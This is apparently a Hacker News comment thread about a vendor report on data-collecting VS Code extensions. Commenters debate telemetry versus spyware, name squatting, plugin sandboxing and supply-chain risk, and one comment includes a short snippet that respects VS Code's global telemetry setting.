With a subtitle of "Securing the cloud", it's hard to see how they are securing anything here, besides removing three extensions that may or may not be malicious. They're not actually providing any solution, even though they end with plugging their CloudGuard Spectral product that wouldn't even help in this particular case...


> This fact highlights again the open-source components risk; no one guarantees that the open sources we use are benign, and it’s our responsibility to verify them.

It's odd to call this "the open-source components risk" when the exact same things are true for closed-source...


Three welcome dialogs at once, enable notifications, cookies and bot wanting to chat plus the crappy low resolution logo were enough for me to not even start reading. Judging by the comments here I didn't miss anything important.


that's why we need WASI/WASM-based sandboxed plugins, scoped based on the capabilities they need.

i think Lapce supports WASI plugins, but the overall UX was not there yet when I last tried.

https://github.com/lapce/lapce


Some people have argued that we should work inside expendable and tightly restricted VMs when doing anything that involves fetching packages from a repository using a package manager. I used to feel that was quite an extreme position but it does make sense because the risk we're discussing is really a consequence of two systemic vulnerabilities. Mainstream desktop operating systems have weak security models that aren't fit for purpose in our modern online-first world. And software development has evolved this strange philosophy that fetching someone else's code for every tiny thing is a good idea and code in someone else's repo is better than anything we could write ourselves. Those are both terrible ideas but neither is going to change quickly so maybe the sandbox advocates aren't so extreme after all?

Also did anyone else notice the timeline at the end of the article where it took 10 days to remove these packages from the repo? I could understand some hesitation if a package has something like debatable telemetry but surely behaviour like obfuscated code should result in an immediate block by default?


>Mainstream desktop operating systems have weak security models that aren't fit for purpose in our modern online-first world

Stop using proprietary software first, then we will discuss your "security" rants. Perl users have been using CPAN since forever, as did LaTeX users with CTAN. Ditto for Emacs users with ELPA and NonGNU. No issues with addons.


This has little to do with being open or proprietary. CPAN is analogous to repositories we use with pip or npm today and most of what is involved is not proprietary on any of those platforms. The relevant differences are cultural and technical.

I don't think invoking CTAN as an example is very convincing. It's well known that there are only seven people in the universe who can actually program TeX and they probably have little interest in trying to infect each other with malware.


They only found these malicious extensions because the malware part was at the top level. Who knows how many are out there that hide this logic in an npm dependency.



Now what if there only was a way to detect apps doing suspicious network requests... /s


I have been leery of VSCode for this reason. The bare product isn’t very special, so you have to download extensions to get the functionality you need. However, there is nothing keeping the extension from communicating. Suddenly, you get malicious extensions that leak data.

It’s not just malicious extension authors. Compromised developers of good extensions are just as much, if not bigger, of a risk.


> I have been leery of VSCode for this reason.

> It’s not just malicious extension authors. Compromised developers of good extensions are just as much, if not bigger, of a risk.

If this is your reason to avoid VSCode, then you should probably start avoiding basically all other code, too. It is after all written by developers, who can be and have been compromised. All over the supply chain. Over and over again. And so on.

But yea, hate on VSCode will you.


replace VSCode with any other code editor and it will still work.

Vim, Emacs, Sublime are all examples of bare products that aren't very special unless you add extensions that could potentially leak data and run arbitrary commands.

the fact that only a couple of extensions have been found leaking some data, involving only a few thousand installs, is honestly a very good record if you ask me.


Vscode was always going to attract such issues. On my system, the app does not have access to the home directory and everything is done on a remote container that I locally ssh into (thanks to flatpak's bubblewrap and docker). As a result everything is cleaner and vscode is isolated from the host.

Access to local folders on the host (though rare) is approved on a needs basis.


I think this is missing advice for staying safe. It mostly just pushes their product and says

> it’s our responsibility to verify

I'd recommend checking if your extensions are from a verified publisher. See https://code.visualstudio.com/api/working-with-extensions/pu...


I always find this question interesting.

Is there money to be made with a company whose main purpose would be to provide periodic checks on source code dependencies? So that for a certain payment, you get to submit a list of dependencies, and they monitor the source code and give you a report with the changes, problems and security issues. So it is like source-code-checking as a service.


I think this is what WhiteSource does. (it's also apparently called Mend now)


Not only are the products confusing (which one does what the parent mentioned?), but the pricing is out of reach for so many that I'm wondering if the company is actually real or not.

Cheapest plan starts at 1333 USD per month!


If you are a big corp and a security leak costs you 10 mil USD, it might make sense to pay. Instead of paying $50k for a one-time security audit, you get a part of it in the form of a subscription.


I wonder if there's a marketplace or active efforts for bad actors to buy popular vscode extensions so that they can inject malware into formerly trusted extensions? If you have a popular vscode extension do you get people reaching out to you to offer to buy it? I know this was fairly commonplace with browser addons.


let this be a reminder that little snitch has existed for a long time and we all should be using it in prompt-for-everything mode.

there are multiple implementations for macos. there are multiple implementations for linux. run, don’t walk.

yes, there are tradeoffs. you may even change your web browsing habits to avoid a tirade of prompts from some random chum bucket. it's all worth it when one of your eyebrows goes up after some process tries to make a dns request it doesn't have any business making. then you hit deny. then you investigate.

now all we need is little snitch for filesystems. maybe we can build it on encrypted fuse mounts.


Hard to gauge the actual impact without privileged access, as I would guess authors of these extensions would pump the downloads to get higher in rankings, raking in higher numbers of actual victims.


Calling analytics telemetry malicious is an exaggeration. But the telemetry should be opt-in, or at least a visible opt-out.


Name/typo squatting is deceptive and malicious. The telemetry helps the attacker detect when a valuable target begins using the software, enabling a targeted supply-chain attack.


Hardly a newsworthy article IMO.


This article is a good example of how to write a misleading headline. They found 3 extensions, one of which has 45k downloads (because it name squats on a popular package), and another with 1000 installs.

The 45k download extension (Darcula Dark) collects some data that I would define as telemetry, and the python-vscode extension is clearly trying to hide what it's doing. Now, whether you define telemetry as malicious or not may shape how you feel, but let's be honest, there's a world of difference between sending your OS version to a telemetry server and injecting obfuscated code.


Woah, that's a narrow view.

Name/typo-squatting is inherently malicious as there's intent to deceive. It doesn't matter what code is _currently_ present, and that can change at any time.

Besides, think about how you'd maliciously use that telemetry. If the author sees installations coming from intuit.com (for example) then they know they are one auto-update away from having a foothold on a company network with tons of sensitive data. That's a targeted supply-chain attack.


This is my thinking exactly. If you put exploit code in there in day one, you are likely to be found out quickly. But if you wait until you detect a valuable target, test the waters with a non-malicious update, then you can probably distribute the malicious update to run in a targeted fashion, perhaps even rolling it back shortly after to reduce later forensic investigation.

We need to stop treating our dev tools like they are trusted. They are not, and they rely more and more on networks of even less trustworthy code. That VSCode doesn't have a proper sandbox or TCB for its plugins is pretty damning.


> collects some data that I would define as telemetry

Maybe the platform and os can be described as "telemetry", but logging the hostname definitely counts as stealing private data!

Apple by default uses the user's name as host name (eg. "John-Does-Macbook-Air.local"), so you could use this to determine if a specific person has installed your extension.

That is spyware, not telemetry.

The malicious extension could then, once it has determined a specific target user has installed the extension, ship a malicious update.


Name squatting always betrays malicious intent. No benefit of the doubt is owed to anyone practicing it.


Before you go down this rabbit hole, consider that many extensions are slight forks of others. There isn't always malicious intent. Just people who try to extend the extensions and publish them without knowing otherwise.

For example go look at any popular "Hello world" type of extension and you'll see many results of extensions in this definition of "name squatting".

i.e. https://marketplace.visualstudio.com/search?term=word%20coun...

VS Code Marketplace has a namesquatting problem. It doesn't always imply malicious intent though.


When you add telemetry to a fork of a thing that didn't previously have telemetry, you don't deserve the benefit of doubt. The original didn't need telemetry, so neither does your fork. Anybody who does this should be assumed malicious.

And telemetry for a fucking color theme? You've got to be shitting me. Whoever did this is a Grade-A scumbag. It didn't happen by accident and there is no possible benign motivation for it. I hope somebody has reported this to the FBI and other relevant authorities.


Non-malicious forks would choose a completely different name and mention the original in their README.

Name squatting relies on people making a typo and installing your stuff. That cannot be innocent, come on now.

Your link also does not prove anything except that people naively make extensions with the same name that feels cute or easily discoverable to them. I see no name squatting in that list, not in the top 10-20 anyway.


> Name squatting relies on people making a typo and installing your stuff. That cannot be innocent, come on now.

You are thinking of typosquatting. And my example shows people can publish extensions squatting on the same extension name as established ones while also changing other metadata to impersonate or spoof popular ones and confuse users quickly looking to install the extension.


But it does imply a trust and quality issue with the VSCode marketplace.

Combined with the lack of a proper sandbox or TCB for plugins, having an untrustworthy “marketplace” makes VSCode sound like a disaster waiting to be installed.


That's an opinion.

Another opinion is that there is plenty of crap on every registry and some are better at surfacing and cleaning up than others.

Similar to the US Navy and ships that are rust-free versus those battling rust. It doesn't affect the performance of those ships, just the perception. Left on for too long could eat away the actual integrity.

Not all problems are the registry's to burden. Trust and quality decisions are very individual for example. There's no same definition used between two people.


VSCode doesn’t even provide a framework for enabling that decision making. Sure, you could forgo the use of any plugins, but so much of VScode’s functionality is derived from plugins, you’d be better off just using notepad.

To be fair, vim and emacs aren’t any better.

Most of our dev tools are based on plug-in models that have zero security model baked in.


> VSCode doesn’t even provide a framework for enabling that decision making.

How about notable publisher, verified publisher, # of downloads, rating, reviews, README, GitHub repository, extension icon, project details, repository maintenance, etc?


Most of those are social signals, and social engineering is a thing. Sure, you can read the code for every single update for every single plug-in you have to use for VSCode to function.

Having a proper set of API boundaries with security guarantees is the right solution. Even “notable publishers” can get hacked.

I don’t even understand why it’s an open question, tbh.


Darcula Dark could easily be what it says it is, which is an innocent take on the Darcula theme. I'd be willing to bet there are innocent VSCode extensions with Darcula in the title, and I don't think that's unreasonable or betrays any kind of intent.


Still doesn't excuse telemetry for something as trivial though.

Innocent == 100% offline and benefiting society. If they need telemetry for a color theme then they are not innocent.


I’m not defending the package, just pointing out that sharing a namespace doesn’t instantly imply guilt


This is even more true considering that VS Code sends telemetry by default (opt-out), making it as a whole "malicious PII stealer code" in the article's terms.


Not really. If you are aware of that and have actively been opting out of VSCode telemetry, it is downright malicious for addons to do it behind your back anyway.


If a product forces you to opt-out from telemetry, it makes sense that extensions would approach the problem the same way and force you to opt-out from each extension's telemetry.

I'm not saying that's good, just that it makes sense that whatever ecosystem/community spawns from your product, they adopt the same methodology as the main product uses.


It makes more sense that the extension would check the configured telemetry enablement state and use that. Perhaps provide an extension-specific override, but certainly don’t default to anything besides the global value.

This is what happens if you use the first party telemetry module msft provides, but obviously not if you’re just sending random http requests.
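
Concretely, respecting the global setting is only a couple of lines (a sketch; sendStats() stands in for whatever reporting the extension does):

    const vscode = require('vscode')

    function sendStats(payload) { /* the extension's own reporting would go here */ }

    function maybeReport(payload) {
      // vscode.env.isTelemetryEnabled reflects the user's global telemetry setting
      if (!vscode.env.isTelemetryEnabled) return
      sendStats(payload)
    }

    // react if the user flips the setting while the extension is running
    vscode.env.onDidChangeTelemetryEnabled(() => { /* pause or resume reporting */ })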


It would be good if VSCode asked you which permissions a plugin should have. E.g. a lot of plugins shouldn't be talking to the internet, writing to disk or similar in the first place. And if they do you should be able to whitelist what they're allowed to access.


There are generally two ways to go about to enable plugins in whatever you're building:

- Clear API boundaries that define what you can and can't do, with each API surface being obsessively guarded in terms of what it lets through. Usually leads to secure extensions, but makes it hard (if not impossible) to do things the API authors didn't foresee, as it's locked down hard. Figma plugins use this approach.

- Give extensions raw access to the host platform, to do whatever they want. This is what VSCode and many others do, which comes with a lot of issues regarding security, but plugin authors can essentially do whatever they want.

The first approach requires a lot of careful consideration, development time and maintenance, while leading also to a somewhat locked down environment. It's more secure, but also limits the usefulness of some extensions.

Microsoft, in their usual lazy fashion, chose the latter approach, probably because it makes the most money sense. Why spend a lot of development time (and money) when you can do it faster and for less money? Some security holes won't lose you a ton of money, but spending N developers building a proper plugin API will for sure cost you a ton of money.


Actually, the VS Code approach is closer to the first one (Clear API boundaries). VS Code extensions don't have direct access to internals, no direct access to the UI [1], and extensions can control VS Code only via the Extension API [2]. However, extensions have access to many standard JS functionalities that could be used in the wrong way.

By the way, Figma plugins can also send arbitrary information (such as file contents) to external servers.

That said, I think it's good idea to add to extensions permissions/capabilities security like in mobile apps.

P.S. If the Extension API doesn't have what you need, there are Proposed APIs [3], but you can't use them in published extensions, and sometimes proposals move very slowly.

[1] https://code.visualstudio.com/api/references/vscode-api [2] https://code.visualstudio.com/api/extension-capabilities/ove... [3] https://code.visualstudio.com/api/advanced-topics/using-prop...


How about a third way:

- Give extensions the ability to do whatever they want (in the sense of not requiring them to only call your specific API signatures), but run then in a sandbox, so that they have to ask for access to the internet, filesystem, and so on?


Certainly not the worst approach, but it might turn out far less watertight than hoped. E.g. there are plenty of places in an html-based UI where you can sneak in a URL that pulls some image, with all the data you can fit in a GET sent upstream. And good luck noticing, when everything is on https and someone decided that certificates should be pinned.


> Not really, if you are aware of that and have been actively been opting out of vscode telemetry

Or use VSCodium instead. https://vscodium.com


And from what I remember VS Code associates your complete MAC address with that telemetry (it applies some ineffective obfuscation).


uhm, it sends your hostname, detailed OS information, and by default, your publicly routable ip address (on the packet). That's pretty malicious.

I don't think the title was deceptive.



